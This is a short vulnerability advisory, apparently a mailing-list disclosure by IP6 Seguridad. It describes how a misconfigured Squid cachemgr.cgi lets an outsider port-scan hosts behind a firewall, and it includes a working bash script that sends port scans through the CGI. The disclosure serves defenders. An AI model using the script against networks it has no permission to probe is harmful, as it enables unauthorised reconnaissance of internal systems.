]-* [IP6] Concept: Squid cachemgr.cgi misconfiguration ]-* [IP6] Configuration error [BID error class] ]-* [IP6] Platform investigated: Linux Redhat 6.2 Squid 2.3STABLE4 Apache 1.3.12 ]-* [IP6] The problem... Due to a misconfiguration on Apache and Squid Is posible to use cachemgr.cgi shipped with Squid to scan hosts under the corporate firewall. ...also we can gater a lot information about the navegation, configuration... ...also there is a lot code with bad programmer habits! There is a lil' script to demonstrate the error, not so clean, but useful. --- Begin nasty code miscachemgr.cgi --- #!/bin/bash -x # Port scanning using a misconfigured squid # using open apache # Usage miscachemgr host_vuln host_to_scan end_port # Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz # Coded by Francisco Sáa Muñoz # IP6 [Logic Control] PORT=1 ONE='/cgi-bin/cachemgr.cgi?host=' TWO='&port=' THREE='&user_name=&operation&auth=' mkdir from_$1_to_$2 while [ $PORT -lt $3 ]; do # lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\ # $2&port=$PORT&user_name=&operation=authenticate&auth= > \ # port_$1_to_$2/$PORT.log 2>&1 lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1 let PORT=PORT+1 done --- End nasty Code --- ]-* [IP6] Solution Deny access, configure it! ]-* [IP6] Thanks Thanks to all IP6 staff for the good feeling. Signed, -- Francisco Sáa Muñoz :: Nuno Treez \(HLP\) Security Consultant/Tiger Team IP6 Seguridad http://www.ip6seguridad.com -- Linux User #119288 Proud mame.dk user #115087 -- "What if I'm not elite? Ragna Gronvold says I'm special" (yes, it's from rfp) -- ]-* [IP6] EOF
